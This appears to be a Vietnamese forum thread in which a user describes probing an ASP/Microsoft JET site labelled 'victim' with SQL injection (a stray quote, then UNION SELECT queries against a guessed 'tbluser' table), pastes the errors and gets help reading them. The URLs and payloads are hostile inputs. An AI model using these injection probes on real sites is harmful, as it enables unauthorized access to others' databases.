Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id =25''.
xxxxxxxxxxxxxx line77  

http://victim/xxxxx.asp?=25 union select 1 from tbluser  

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match. (1)
xxxxxxxxxxxxxxx line77  

http://victim/xxxxx.asp?id=25 union select 1,2 from tbluser
thì nó báo : Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.
xxxxxxxxxxxxxxxx line77  

http://victim/xxxxx.asp?id=1
Sau khi xem dấu ' vào victim/xxxxx.asp?id=25'
thì nó báo

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id =25''.
xxxxxxxxxxxxxx line77  

Mình đã khai thác nó như sau

http://victim/xxxxx.asp?=25 union select 1 from tbluser  

thì nó báo là

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match. (1)
xxxxxxxxxxxxxxx line77  

Chúng tỏ tbluser tồn tại
nhưng khi thêm vào

http://victim/xxxxx.asp?id=25 union select 1,2 from tbluser
thì nó báo : Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.
xxxxxxxxxxxxxxxx line77  

Thêm vào 3,4,5,6,7 gì nó cũng báo thế
Nó báo như thế này thì chúng tỏ tbluser là sai nhưng ở trên (1) thì chúng tỏ tbluser này tồn tại ( không biết có đúng hay không)
Giờ cần 1 cao kiến giúp
Thân
 

The number of columns in the two selected tables or queries of a union query do not match  

Query input must contain at least one table or query.  

Nó báo

The number of columns in the two selected tables or queries of a union query do not match  

thế này mà anh nói là không có căn cứ
Nó cũng giống như 1 thẳng mỹ hỏi bà già " con bà trốn đâu?" bà già " tui biết nó trốn trong đống rơm mà tui không chỉ đâu " ( nói vui tí )

Nếu ở bước 1 nó báo

Query input must contain at least one table or query.  

thì em sẽ hiểu tbluser là sai
Nhưng ở đây khi thêm số 2 vào nó mới báo như thế, em không hiểu vấn đề ngay đó. Anh hoặc ai đó có thể giải thích rõ hơn ko
Cái này lúc trước em cũng có gặp 1 lần lúc học sql và kiểm tra lại là table_name mình sai
 

quanlongit wrote:

Nó báo

The number of columns in the two selected tables or queries of a union query do not match  

thế này mà anh nói là không có căn cứ
Nó cũng giống như 1 thẳng mỹ hỏi bà già " con bà trốn đâu?" bà già " tui biết nó trốn trong đống rơm mà tui không chỉ đâu " ( nói vui tí )

Nếu ở bước 1 nó báo

Query input must contain at least one table or query.  

thì em sẽ hiểu tbluser là sai
Nhưng ở đây khi thêm số 2 vào nó mới báo như thế, em không hiểu vấn đề ngay đó. Anh hoặc ai đó có thể giải thích rõ hơn ko
Cái này lúc trước em cũng có gặp 1 lần lúc học sql và kiểm tra lại là table_name mình sai
 

Từ:
http://victim/xxxxx.asp?=25 union select 1 from tbluser

cho ra:
The number of columns in the two selected tables or queries of a union query do not match

có nghĩa là "select 1 từ table tbluser" xảy ra trước nhưng tbluser không tồn tại thì cột số một cũng chẳng có --> false.